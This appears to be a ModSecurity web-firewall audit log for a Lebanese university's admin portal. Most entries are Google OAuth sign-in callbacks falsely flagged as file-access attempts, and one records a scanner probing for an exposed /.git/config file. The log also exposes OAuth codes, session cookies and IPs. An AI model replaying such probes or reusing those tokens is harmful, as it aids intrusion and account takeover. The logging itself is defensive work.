cookie: PHPSESSID=vut7gu6g6o46p69qsocej4he96 --fb13d031-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --fb13d031-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH7vxukk8cgt8UnU9qbqwAAAFU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753349055997864 456250 (- - -) Stopwatch2: 1753349055997864 456250; combined=4698, p1=737, p2=3560, p3=140, p4=60, p5=200, sr=267, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb13d031-Z-- --c6fbde72-A-- [24/Jul/2025:12:27:07.717238 +0300] aIH8a1ooLYw4or2LgWLYqwAAANQ 3.14.254.96 38296 127.0.0.1 7081 --c6fbde72-B-- GET /.git/config HTTP/1.0 Host: test.kime.agency X-Real-IP: 3.14.254.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --c6fbde72-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --c6fbde72-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.git/config"] [unique_id "aIH8a1ooLYw4or2LgWLYqwAAANQ"] Stopwatch: 1753349227712595 4790 (- - -) Stopwatch2: 1753349227712595 4790; combined=2691, p1=566, p2=2011, p3=0, p4=0, p5=114, sr=163, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6fbde72-Z-- --3bcf1048-A-- [24/Jul/2025:12:29:52.472085 +0300] aIH9EBukk8cgt8UnU9qk_AAAAFI 141.105.87.197 36752 127.0.0.1 7081 --3bcf1048-B-- GET /administration/index.php?code=4/0AVMBsJil4tILch9W8O3FLadXMUWzZRTS52eauMRSHbuTw-V3W_CeKHszGjn7oRzkYJZ3jg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=2&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=4poic0ignrkj06q9aloqid5ug7 --3bcf1048-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --3bcf1048-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH9EBukk8cgt8UnU9qk_AAAAFI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753349392009556 462726 (- - -) Stopwatch2: 1753349392009556 462726; combined=4848, p1=619, p2=3885, p3=148, p4=63, p5=131, sr=185, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3bcf1048-Z-- --9431e924-A-- [24/Jul/2025:12:30:34.515720 +0300] aIH9Ohukk8cgt8UnU9ql0gAAAEE 195.112.198.68 54830 127.0.0.1 7081 --9431e924-B-- GET /administration/index.php?code=4/0AVMBsJjO7CcWzmDhMXCtmUeadZOvXEJH-XlO7rT_193e_Wb_YWx-oPZPzxVW1Js76MDhgQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: college.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0ou2lq5tu0pesms1so97mkhtt1 --9431e924-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3649 Content-Type: text/html; charset=UTF-8 --9431e924-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||college.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||college.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "college.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH9Ohukk8cgt8UnU9ql0gAAAEE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/college.jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753349434040078 475801 (- - -) Stopwatch2: 1753349434040078 475801; combined=4618, p1=666, p2=3620, p3=120, p4=63, p5=149, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9431e924-Z-- --cff43515-A-- [24/Jul/2025:12:32:27.714543 +0300] aIH9qxukk8cgt8UnU9qp5AAAAFg 212.28.242.188 59290 127.0.0.1 7081 --cff43515-B-- GET /administration/index.php?code=4/0AVMBsJgu-CQd1RCEgjuQ-rFAYHeqC8fGBQOwm3eziLWHvcmO9TylwTbWiEQx866lgtYn3A&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=bo0opnv1rkmcjup9k6860hf4s0 --cff43515-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --cff43515-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH9qxukk8cgt8UnU9qp5AAAAFg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753349547246047 468676 (- - -) Stopwatch2: 1753349547246047 468676; combined=4406, p1=643, p2=3382, p3=183, p4=66, p5=131, sr=170, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cff43515-Z-- --38bacc3b-A-- [24/Jul/2025:12:33:49.811010 +0300] aIH9_UdutIOpb_kg22jewwAAAAg 212.28.242.188 35176 127.0.0.1 7081 --38bacc3b-B-- GET /administration/index.php?code=4/0AVMBsJhgnref-b3zBXQVnrArYiSO7XP_Iyp38xa_hkNDHrTHi3BAHJ_PkQIGTND-OngIkQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-fetch-dest: document user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 referer: https://accounts.google.com/ sec-fetch-site: cross-site sec-fetch-mode: navigate accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i accept-encoding: gzip, deflate, br cookie: PHPSESSID=8nobotf1qklp9cks5l4jvv7990 --38bacc3b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --38bacc3b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH9_UdutIOpb_kg22jewwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753349629360539 450629 (- - -) Stopwatch2: 1753349629360539 450629; combined=5236, p1=775, p2=4070, p3=109, p4=148, p5=134, sr=269, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38bacc3b-Z-- --900c4207-A-- [24/Jul/2025:12:43:08.585230 +0300] aIIALBukk8cgt8UnU9q7vgAAAEk 212.28.242.188 35776 127.0.0.1 7081 --900c4207-B-- GET /administration/index.php?code=4/0AVMBsJgz3VLXa-IhENsnBWNI8WzJYfSvnp1ckR7zpysq2FL5XhqXpyJ3mM7-7ivOpzku8w&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=mdo3pesladhiq4t2v5c3doj7i0 --900c4207-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --900c4207-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIALBukk8cgt8UnU9q7vgAAAEk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350188120143 465447 (- - -) Stopwatch2: 1753350188120143 465447; combined=6074, p1=817, p2=4840, p3=151, p4=61, p5=204, sr=243, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --900c4207-Z-- --94f2717e-A-- [24/Jul/2025:12:44:51.854442 +0300] aIIAkxukk8cgt8UnU9q-qQAAAEA 195.112.198.68 49736 127.0.0.1 7081 --94f2717e-B-- GET /administration/index.php?code=4/0AVMBsJj7U2vIQ9hdZrXpUVexAsnyY4XFCgve-0-Czu8xyeg15vHeXjbwnklqz_V8y69_HA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=hvva38ip8a44f1aatti7dtm5l1 --94f2717e-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --94f2717e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIAkxukk8cgt8UnU9q-qQAAAEA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350291404403 450296 (- - -) Stopwatch2: 1753350291404403 450296; combined=6842, p1=849, p2=5662, p3=118, p4=81, p5=132, sr=199, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --94f2717e-Z-- --a5cd6232-A-- [24/Jul/2025:12:48:08.323979 +0300] aIIBVxukk8cgt8UnU9rDJwAAAEs 212.28.242.188 49884 127.0.0.1 7081 --a5cd6232-B-- GET /administration/index.php?code=4/0AVMBsJggXnpPTf19v9bzPs38l8-44slY_NnzXRsxRlcjEb1rN5_Aszzj5ZMdQigrTcKL7w&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=gnoeo0levn9m11qqbnq635ed16 --a5cd6232-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --a5cd6232-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile 